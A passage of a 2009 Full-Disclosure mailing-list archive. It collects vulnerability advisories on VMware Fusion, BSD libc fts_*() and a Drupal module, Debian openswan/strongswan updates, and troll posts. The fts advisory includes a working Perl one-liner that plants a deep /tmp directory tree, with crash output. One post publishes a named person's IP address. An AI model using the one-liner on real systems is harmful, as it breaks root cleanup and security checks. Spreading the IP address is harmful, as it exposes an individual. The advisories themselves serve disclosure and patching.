- http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091002/a03b8934/attachment.html From mu-b at digit-labs.org Fri Oct 2 09:40:05 2009 From: mu-b at digit-labs.org (mu-b) Date: Fri, 02 Oct 2009 09:40:05 +0100 Subject: [Full-disclosure] VMSA-2009-0013 VMware Fusion resolves two security issues In-Reply-To: <4AC58B69.3000008@vmware.com> References: <4AC58B69.3000008@vmware.com> Message-ID: <4AC5BC65.4020906@digit-labs.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 All - the first bug is self-explanatory, > # Kernel denial of service vulnerability > An integer overflow vulnerability in the vmx86 kernel extension allows > for a denial of service by an unprivileged user. The vmx86 kext ioctl handler contains several integer overflows which lead to kernel heap corruptions. These are probably not exploitable, and I didn't try given the second bug, http://www.digit-labs.org/files/exploits/vmware-pop.c > # Kernel code execution vulnerability > An ioctl vulnerability in the vmx86 kernel extension allows for > executing arbitrary code in the kernel context by an unprivileged > user. The vmx86 kext ioctl handler permits an unprivileged userland program to initialize several function pointers via the 0x802E564A ioctl code. These function pointers are later used from several reachable locations within the driver, one of which is called immediately after initialization. http://www.digit-labs.org/files/exploits/vmware-fission.c - -- mu-b (mu-b at digit-labs.org) "Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct." - Anonymous, "P ?= NP" -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkrFvGUACgkQY0H9BP42EjxSCACdEzIXe0D8n+VVplyEsuCbPBKS TjAAnAnHUPOSKrphGeaynF5bIKYQNyPY =lMJv -----END PGP SIGNATURE----- From cxib at securityreason.com Fri Oct 2 08:36:16 2009 From: cxib at securityreason.com (Maksymilian Arciemowicz) Date: Fri, 02 Oct 2009 09:36:16 +0200 Subject: [Full-disclosure] libc:fts_*() Multiple Denial of Service Message-ID: <4AC5AD70.5010808@securityreason.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [libc:fts_*() Multiple Denial of Service ] Author: Maksymilian Arciemowicz SecurityReason.com Date: - - Dis.: 03.08.2009 - - Pub.: 02.10.2009 We are going inform all vendors, about this problem. Affected Software (official): - - OpenBSD 4.5 (fix available) - - NetBSD 5.0.1 (fix available) probably more... Original URL: http://securityreason.com/achievement_securityalert/68 - --- 0.Description --- The fts functions are provided for traversing UNIX file hierarchies. The fts_open() function returns a "handle" on a file hierarchy, which is then supplied to the other fts functions. The function fts_read() returns a pointer to a structure describing one of the files in the file hierarchy. The function fts_children() returns a pointer to a linked list of structures, each of which describes one of the files contained in a directory within the hierarchy. typedef struct _ftsent { unsigned short fts_info; /* flags for FTSENT structure */ char *fts_accpath; /* access path */ char *fts_path; /* root path */ size_t fts_pathlen; /* strlen(fts_path) */ char *fts_name; /* file name */ size_t fts_namelen; /* strlen(fts_name) */ short fts_level; /* depth (-1 to N) */ int fts_errno; /* file errno */ long fts_number; /* local numeric value */ void *fts_pointer; /* local address value */ struct _ftsent *fts_parent; /* parent directory */ struct _ftsent *fts_link; /* next file structure */ struct _ftsent *fts_cycle; /* cycle structure */ struct stat *fts_statp; /* stat(2) information */ } FTSENT; - --- 1. libc:fts_*() Multiple Denial of Service --- In March 2009, we have reported an issue (SREASONRES:20090304) in libc (fts.c). Now we want to present the conclusions and show the usefulness of this vulnerabality. Fix provided by OpenBSD Team will protect us by crash but we think, not for all cases, that are showed in this advisory. Index: fts.c =================================================================== RCS file: /cvs/src/lib/libc/gen/fts.c,v retrieving revision 1.41 diff -u -p -r1.41 fts.c - - --- fts.c 27 Dec 2008 12:30:13 -0000 1.41 +++ fts.c 10 Feb 2009 09:00:24 -0000 @@ -633,6 +633,14 @@ fts_build(FTS *sp, int type) len++; maxlen = sp->fts_pathlen - len; + if (cur->fts_level == SHRT_MAX) { + (void)closedir(dirp); + cur->fts_info = FTS_ERR; + SET(FTS_STOP); + errno = ENAMETOOLONG; + return (NULL); + } + level = cur->fts_level + 1; /* Read the directory, attaching each entry to the `link' pointer. */ So let`s see /etc/rc.d/cleartmp (NetBSD 5.0.1). This script use rm(1) with rf args. Line 40-41: find -x . ! -name . ! -name lost+found ! -name quota.user \ ! -name quota.group -exec rm -rf -- {} \; -type d -prune) here daemon will come to tmp_dir (/tmp) and wants clean it with the sequence "[a-km-pr-zA-Z]*". It will kill this script anytime when they will be started. So if we create directory "A" in /tmp, all other files and directories in alphabetical order, will not be delete. Proof of Concept: User cxib, have created exploit in main /tmp dir. exploit: 127# cd /tmp && perl -e '$a="C"x22;for(1..50000){ ! -d $a and mkdir $a and chdir $a }' In /tmp we have # ls -la total 22 drwxrwxrwt 10 root wheel 512 Aug 11 01:18 . drwxr-xr-x 27 root wheel 1024 Aug 11 00:09 .. drwxrwxrwx 2 root wheel 512 Aug 11 00:49 .ICE-unix - -r--r--r-- 1 root wheel 11 Aug 11 00:11 .X0-lock drwxrwxrwt 2 root wheel 512 Aug 11 00:11 .X11-unix - -rw-r--r-- 1 root wheel 0 Aug 11 01:18 A drwxr-xr-x 2 root wheel 512 Aug 11 01:15 B drwxr-xr-x 3 cxib wheel 512 Aug 6 01:43 CCCCCCCCCCCCCCCCCCCCCC drwxr-xr-x 2 root wheel 512 Aug 11 01:15 D - -rw-r--r-- 1 root wheel 0 Aug 11 01:16 chujwamwmuzg drwx------ 2 root wheel 512 Aug 11 00:49 kde-root drwx------ 3 root wheel 512 Aug 11 01:14 ksocket-root drwx------ 2 root wheel 512 Aug 11 00:11 mc-root correct behavior will delete all files after reboot. So lets do it. # reboot Now we have in /tmp # ls -la total 18 drwxrwxrwt 9 root wheel 512 Aug 11 13:57 . drwxr-xr-x 27 root wheel 1024 Aug 11 14:02 .. drwxrwxrwx 2 root wheel 512 Aug 11 00:49 .ICE-unix drwxrwxrwt 2 root wheel 512 Aug 11 01:19 .X11-unix drwxr-xr-x 3 cxib wheel 512 Aug 6 01:43 CCCCCCCCCCCCCCCCCCCCCC drwxr-xr-x 2 root wheel 512 Aug 11 01:15 D - -rw-r--r-- 1 root wheel 0 Aug 11 01:16 chujwamwmuzg drwx------ 2 root wheel 512 Aug 11 00:49 kde-root drwx------ 3 root wheel 512 Aug 11 01:19 ksocket-root drwx------ 2 root wheel 512 Aug 11 00:11 mc-root file A and dir B has been deleted. But file chujwamwmuzg and directories {D,Cx22} are still avaliable. To resolve, we can use openbsd fix. However, this does not fully resolve the problem. The user can create a direcory (like Cx22) that can not be removed by rm(1). To remove Cx22 folder, we can use program made by openbsd - --- #include #include #include int main(int argc, char *argv[]) { int ret = 0; while (chdir(argv[1]) == 0) ; warn("chdir"); while (ret == 0) { unlink("du.core"); ret = chdir(".."); if (ret) err(1, "chdir"); ret = rmdir(argv[1]); if (ret) err(1, "rmdir"); } } - --- However, if the attacker uses a random functions, the removal prooccess of such trees will not be easy. libc/fts do not support trees bigger as SHRT_MAX. NetBSD has first changed it to INT_MAX (fix) There are still a few other PoC. If option find_core is "yes" (default), we can turn off this option for root using our exploit in advisory. vulnerable code in file /etc/daily (netbsd) find / \( $ignfstypes \) -prune -o \ -name 'lost+found' -prune -o \ \( -name '*.core' -o -name 'core' \) -type f -print > $TMP under NetBSD root will get - --- Uptime: 3:15AM up 6:22, 9 users, load averages: 0.34, 0.21, 0.18 [1] Segmentation fault (core dumped) find / "(" ${ign... - --- next vulnerable code is located in /etc/security. Option check_devices will display any changes in setuid files and devices. - --- find / $ignexpr \ \( \( -perm -u+s -a ! -type d \) -o \ \( -perm -g+s -a ! -type d \) -o \ -type b -o -type c \) -print0 | \ xargs -0 ls -ldgTq | sort +9 > $LIST - --- in netbsd, after attack root will get - --- Checking setuid files and devices: Setuid/device find errors: ls: /dev/ttyC: No such file or directory [1] Segmentation fault (core dumped) find / ${ignexpr... | Done(123) xargs -0 ls -ldgTq | Done sort +9 >${LIST} - --- in openbsd - --- Checking setuid/setgid files and devices: Setuid/device find errors: find: fts_read: File name too long Removing scratch and junk files: find: fts_read: File name too long - --- We can try find a few others PoC for this issue. We think the system should have more control over file system. Abstract solution are not good. This vulnerability can also prevent use options like per_user_tmp=yes. If the attacker creates such a structure with different names, the administrator will be deprived of opportunities to change settings for /tmp. Affected programs (rm(1),cp(1),find(1),chmod(1),chown(1) etc) are also found in other scripts. - --- 2. Fix --- This fix will change libc:fts structure NetBSD fix: http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/distrib/sets/lists/base/md.amd64#rev1.63 http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/distrib/sets/lists/base/md.sparc64#rev1.57 http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/distrib/sets/lists/base/shl.mi#rev1.485 http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/include/fts.h#rev1.19 http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/lib/libc/shlib_version#rev1.214 http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/lib/libc/compat/gen/Makefile.inc#rev1.12 http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/lib/libc/compat/gen/compat___fts50.c#rev1.1 http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/lib/libc/gen/fts.c#rev1.39 OpenBSD fix: http://www.openbsd.org/cgi-bin/cvsweb/src/include/fts.h http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.c http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/find/function.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.3 http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/du/du.c Old OpenBSD fix for SREASONRES:20090304: http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.c http://securityreason.com/achievement_securityalert/60 (SREASONRES:20090304) - --- 2. Greets --- sp3x Infospec Chujwamwdupe p_e_a pi3 - --- 3. Contact --- Author: SecurityReason.com [ Maksymilian Arciemowicz ] Email: cxib }a.t{ securityreason (d00t] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl -----BEGIN PGP SIGNATURE----- iEYEARECAAYFAkrFrXAACgkQpiCeOKaYa9aTogCeJB/W0UpO2UtSesNV37sX8Aos 39kAnjo0b9tWTL0wmZhmVao97gMXqBNd =O28t -----END PGP SIGNATURE----- From infodroppa at yahoo.com Fri Oct 2 15:24:35 2009 From: infodroppa at yahoo.com (Nobody Special) Date: Fri, 2 Oct 2009 07:24:35 -0700 (PDT) Subject: [Full-disclosure] So weev... Message-ID: <825771.12518.qm@web113116.mail.gq1.yahoo.com> 216.12.127.190 Enjoy. He's been using this IP address for awhile. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091002/9da1c5c5/attachment.html From justin at madirish.net Fri Oct 2 15:42:49 2009 From: justin at madirish.net (Justin Klein Keane) Date: Fri, 02 Oct 2009 10:42:49 -0400 Subject: [Full-disclosure] Drupal Service Links 6.x-1.0 XSS Vulnerability Message-ID: <4AC61169.8030809@madirish.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Description of Vulnerability: - - - ----------------------------- Drupal (http://drupal.org) is a robust content management system (CMS) written in PHP and MySQL that provides extensibility through various third party modules. The Service links module (http://drupal.org/project/service_links) "enables admins to add links to a number of social bookmarking sites, blog search sites etc. " The Service Links module contains a cross site scripting vulnerability because it does not properly sanitize output of content type names before display. Systems affected: - - - ----------------- Drupal 6.14 with Service links 6.x-1.0 was tested and shown to be vulnerable. Impact: - - - ------- XSS vulnerabilities may expose site administrative accounts to compromise which could lead to web server process compromise. Mitigating factors: - - - ------------------- The Service links module must be installed. To carry out a Service links based XSS exploit the attacker must have 'administer content types' permissions. Proof of Concept: - - --------------------- 1. Install Drupal 6.14 2. Install Service links 6.x-1.0 3. Enable the Service links module from Administer -> Site building -> Modules 4. Create a new Content type from Administer -> Content management -> Content types and click 'Add content type' 5. For the 'name' field enter "" and save the content type 6. Click Administer -> Site configuration -> Service links to trigger the JavaScript Technical details: - - ------------------------ The Service links module fails to sanitize the output of the content type names before display. Applying the following patch fixes this vulnerability. Patch - - ------- Applying the following patch mitigates these threats. - --- service_links/service_links.module 2008-02-26 12:01:27.000000000 -0500 +++ service_links_fixed/service_links.module 2009-10-02 06:33:21.000000000 -0400 @@ -35,11 +35,12 @@ function service_links_admin_settings() '#title' => t('Where to show the service links'), '#description' => t('Set the node types and categories you want to display links for.'), ); + $names = array_map('filter_xss', node_get_types('names')); $form['where_to_show_the_links']['service_links_node_types'] = array( '#type' => 'checkboxes', '#title' => t('Node types'), '#default_value' => variable_get('service_links_node_types', array()), - - '#options' => node_get_types('names'), + '#options' => $names, ); if (module_exists('taxonomy')) { $form['where_to_show_the_links']['service_links_category_types'] = array( - -- Justin C. Klein Keane http://www.MadIrish.net -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mandriva - http://enigmail.mozdev.org iPwEAQECAAYFAkrGEWkACgkQkSlsbLsN1gBl7wb+IW9Jk9N8ewZfa4mDxj8W1AVI jG20xNmLhO9juy8SLe1VD6aAEB5vSDLGOQKB9bIZIuGHRbTwCh1CRYy3RldBCuMn SKDtBHDpCSLRiy3QfUUeFud7z5GaLoPkJ8x9Esrs3bWtt2mM6AtFmCpuiGWffXWB oBvlSpBF2QylQi8kZMqcjzQsuVEdJip/nMfbUWYrTWw4mGANXGIZiWG2ADeNKUAR uI6caEFcLAcSiRP67k8PXyuMuMVY2RWVVmetemBmJKX5ToUNNSHC+Zhw8UUQ9A99 NzGOoXc2dSXhuR9GxJs= =YUno -----END PGP SIGNATURE----- From fw at deneb.enyo.de Fri Oct 2 19:25:39 2009 From: fw at deneb.enyo.de (Florian Weimer) Date: Fri, 02 Oct 2009 18:25:39 +0000 Subject: [Full-disclosure] [SECURITY] [DSA 1898-1] New openswan packages fix denial of service Message-ID: <874oqh3b6k.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1898-1 security at debian.org http://www.debian.org/security/ Florian Weimer October 02, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : openswan Problem type : remote Debian-specific: no CVE Id(s) : CVE-2009-2185 It was discovered that the pluto daemon in the openswan, an implementation of IPSEC and IKE, could crash when processing a crafted X.509 certificate. For the old stable distribution (etch), this problem has been fixed in version 2.4.6+dfsg.2-1.1+etch2. For the stable distribution (lenny), this problem has been fixed in version 2.4.12+dfsg-1.3+lenny2. For the unstable distribution (sid), this problem has been fixed in version 2.6.22+dfsg-1. We recommend that you upgrade your openswan package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2.orig.tar.gz Size/MD5 checksum: 3555236 e5ef22979f8a67038f445746fdc7ff38 http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2.diff.gz Size/MD5 checksum: 91729 e7772358f397628f18f8590b2381a360 http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2.dsc Size/MD5 checksum: 879 3210a5ae193686c4f7fcd54c7855d720 Architecture independent packages: http://security.debian.org/pool/updates/main/o/openswan/openswan-modules-source_2.4.6+dfsg.2-1.1+etch2_all.deb Size/MD5 checksum: 522838 0368797b593a98c90d6e06cbe6743413 http://security.debian.org/pool/updates/main/o/openswan/linux-patch-openswan_2.4.6+dfsg.2-1.1+etch2_all.deb Size/MD5 checksum: 599200 1780b2e6a74358d4caf2bde57f3b8f17 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_alpha.deb Size/MD5 checksum: 1798002 0c82e879ab4437375188a65edc88dc3c amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_amd64.deb Size/MD5 checksum: 1675158 db6086977260bbb4bb122d1bab3d3af5 arm architecture (ARM) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_arm.deb Size/MD5 checksum: 1718930 99c1b3db0733aa752802d3bac61dee5a hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_hppa.deb Size/MD5 checksum: 1771158 7342b46f65862bee24eb47e6d19d3a33 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_i386.deb Size/MD5 checksum: 1698718 4149cea4bc3176f5882e4c7f84eabf56 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_ia64.deb Size/MD5 checksum: 1930186 e1026107147145804d91567013b23329 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_mips.deb Size/MD5 checksum: 1692076 2b7f7d0c3bda2016453e91424c6a483a mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_mipsel.deb Size/MD5 checksum: 1697442 5ab952bf26a3b392b5c9ef1406a24019 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_powerpc.deb Size/MD5 checksum: 1667696 e84e9f2d87d6cf1b544e650867877c4e s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_s390.deb Size/MD5 checksum: 1671262 7d9b4488c61b3261478e4598e2d1cbe9 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.6+dfsg.2-1.1+etch2_sparc.deb Size/MD5 checksum: 1689370 f00222a3310c2758204de6ded56cfa4b Debian GNU/Linux 5.0 alias lenny - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg-1.3+lenny2.dsc Size/MD5 checksum: 1315 2eb502ff966ff81e9da9930889f6199c http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg.orig.tar.gz Size/MD5 checksum: 3765276 f753413e9c705dee9a23ab8db6c26ee4 http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg-1.3+lenny2.diff.gz Size/MD5 checksum: 145354 d0ef8b06a64471210268de94f79bfcbe Architecture independent packages: http://security.debian.org/pool/updates/main/o/openswan/linux-patch-openswan_2.4.12+dfsg-1.3+lenny2_all.deb Size/MD5 checksum: 613180 a589be2a64b1715d209f9c28a5654ea6 http://security.debian.org/pool/updates/main/o/openswan/openswan-modules-source_2.4.12+dfsg-1.3+lenny2_all.deb Size/MD5 checksum: 537728 e0f72fde54078d6fc805fe27f1a4c688 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg-1.3+lenny2_alpha.deb Size/MD5 checksum: 1825688 cecb628caabdc6848734f335e4b14813 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg-1.3+lenny2_amd64.deb Size/MD5 checksum: 1767032 12f084adacc24ebe4f03c6106b6ecc11 arm architecture (ARM) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg-1.3+lenny2_arm.deb Size/MD5 checksum: 1756446 b07bc1876b226a960afcf443cebdf868 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg-1.3+lenny2_armel.deb Size/MD5 checksum: 1736620 d3f87f7a3756ab47bedeb23cbabc7c29 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg-1.3+lenny2_hppa.deb Size/MD5 checksum: 1805586 c0d564fc0db6241a52bd5e20fadeecb9 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg-1.3+lenny2_i386.deb Size/MD5 checksum: 1722564 6d6f09820c51c80105b83c5369b94815 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg-1.3+lenny2_ia64.deb Size/MD5 checksum: 1964688 ccd9a5a84b6c9517f5cfa65aee91872d mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg-1.3+lenny2_mips.deb Size/MD5 checksum: 1703500 c1570749962f3d983ce6ab3589ed60ae mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg-1.3+lenny2_mipsel.deb Size/MD5 checksum: 1710082 1c220e8c8244141f67ae46267ed89844 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg-1.3+lenny2_powerpc.deb Size/MD5 checksum: 1710982 39f9f36c47954570d88c089ce23d7d32 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg-1.3+lenny2_s390.deb Size/MD5 checksum: 1695204 d6b47d731eddfd3a443aea2c5e233147 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/o/openswan/openswan_2.4.12+dfsg-1.3+lenny2_sparc.deb Size/MD5 checksum: 1717100 e0c7c8bab8e8da06ad88bfa47431b7b1 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJKxkYEAAoJEL97/wQC1SS+HRgH/jTSulB3tvuBrscF9OO7hCGg NpEJ7h/T69lQyxUR+H1mgdVNjC9VNXtBkZ81y+RQdK7+Ja8pEoiNEJ7zMeONnkci rk4ubabYjojZ/0+rSdXl8a6Z9F3gvQuHmvuN/FYAdH48Ln7sU0QPLKlGR9No9Wv3 8hfB5LBSDzSgDQCDJmc4ByZ0dIIBJ/T+Wnhy8GuAs/q9B5MgneHpOCdJjtA6JU53 /F6SQAC1mCGWXmBwZNQUDAOP25XTaPEeWZwDi0ZFmFOXSkcvv/2XM5IlthSywF/P CFrWG/9cve02An516eMCYHjFXfA4TTzUuJ882oVcQVkgsFboRKIo8ccxmAe/+d4= =gmpD -----END PGP SIGNATURE----- From full-censorship at hushmail.com Fri Oct 2 18:59:45 2009 From: full-censorship at hushmail.com (full-censorship at hushmail.com) Date: Fri, 02 Oct 2009 18:59:45 +0100 Subject: [Full-disclosure] Please ban the Trolls. Message-ID: <20091002175945.4317928039@smtp.hushmail.com> don't stop at n3td3v ban the others as well. thank me later, the full-censorship movement From fw at deneb.enyo.de Fri Oct 2 19:41:34 2009 From: fw at deneb.enyo.de (Florian Weimer) Date: Fri, 02 Oct 2009 18:41:34 +0000 Subject: [Full-disclosure] [SECURITY] [DSA 1899-1] New strongswan packages fix denial of service Message-ID: <87my491vvl.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1899-1 security at debian.org http://www.debian.org/security/ Florian Weimer October 02, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : strongswan Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2009-1957 CVE-2009-1958 CVE-2009-2185 CVE-2009-2661 Debian Bug : 531612 533837 540144 Several remote vulnerabilities have been discovered in strongswan, an implementation of the IPSEC and IKE protocols. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-1957 CVE-2009-1958 The charon daemon can crash when processing certain crafted IKEv2 packets. (The old stable distribution (etch) was not affected by these two problems because it lacks IKEv2 support.) CVE-2009-2185 CVE-2009-2661 The pluto daemon could crash when processing a crafted X.509 certificate. For the old stable distribution (etch), these problems have been fixed in version 2.8.0+dfsg-1+etch2. For the stable distribution (lenny), these problems have been fixed in version 4.2.4-5+lenny3. For the unstable distribution (sid), these problems have been fixed in version 4.3.2-1.1. We recommend that you upgrade your strongswan packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2.diff.gz Size/MD5 checksum: 58570 945cc03b76743138f14b9719a204fedb http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg.orig.tar.gz Size/MD5 checksum: 3155518 8b9ac905b9bcd41fb826e3d67e90a33d http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2.dsc Size/MD5 checksum: 811 6787c4f1c81bc390d2d4c5ef7cd1f004 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_alpha.deb Size/MD5 checksum: 1210988 0ea0beeecfd0569a417cdd7a8890afa0 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_amd64.deb Size/MD5 checksum: 1100154 e7975b7c9593e6813b1ab2391488fd5e arm architecture (ARM) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_arm.deb Size/MD5 checksum: 1070960 49bb60a09eeffd0b82abea6a742099ea hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_hppa.deb Size/MD5 checksum: 1133960 e2fd0221197dfc3624ff95095453883a i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_i386.deb Size/MD5 checksum: 1054160 3859569cbea184e01cb17158458a86e0 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_ia64.deb Size/MD5 checksum: 1453188 ef4f77c2fafc736399b1cf24eba13ab2 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_mips.deb Size/MD5 checksum: 1124320 b163fda8163d818f160658bc2b1a764c mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_mipsel.deb Size/MD5 checksum: 1129922 d6ae9af171b053e87e4cff2ed30588f1 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_powerpc.deb Size/MD5 checksum: 1097810 c9f14e78602cf64488374ff27edb9fa4 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_s390.deb Size/MD5 checksum: 1083894 3dac1f759f83817c674e29a9db14dc48 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_2.8.0+dfsg-1+etch2_sparc.deb Size/MD5 checksum: 1030670 e52adc5269d580dd987d1a6a6d031872 Debian GNU/Linux 5.0 alias lenny - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/s/strongswan/strongswan_4.2.4-5+lenny3.diff.gz Size/MD5 checksum: 61133 b619f96758667d0968c5572c3014d8be http://security.debian.org/pool/updates/main/s/strongswan/strongswan_4.2.4-5+lenny3.dsc Size/MD5 checksum: 1602 1ea34a8afadc1d588b11d89d9e40a12b http://security.debian.org/pool/updates/main/s/strongswan/strongswan_4.2.4.orig.tar.gz Size/MD5 checksum: 3295212 92ddfaedd6698bc6640927def271d476 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_4.2.4-5+lenny3_alpha.deb Size/MD5 checksum: 1301924 9b04ce068a381ae22f56649c68651986 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_4.2.4-5+lenny3_amd64.deb Size/MD5 checksum: 1180738 035f9bb4259a1e3f2399680a1683a98f arm architecture (ARM) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_4.2.4-5+lenny3_arm.deb Size/MD5 checksum: 1028530 f28fcfb750422e4f586510cd7f9f911a armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_4.2.4-5+lenny3_armel.deb Size/MD5 checksum: 1035544 88390cad9b508b2c8fad0aa35dc8239e hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_4.2.4-5+lenny3_hppa.deb Size/MD5 checksum: 1217010 94c648fa6a84688768e9b1a879a9f2db i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_4.2.4-5+lenny3_i386.deb Size/MD5 checksum: 1099208 348f57f1abb9b9c29f7ce63454b6b52a ia64 architecture (Intel ia64) 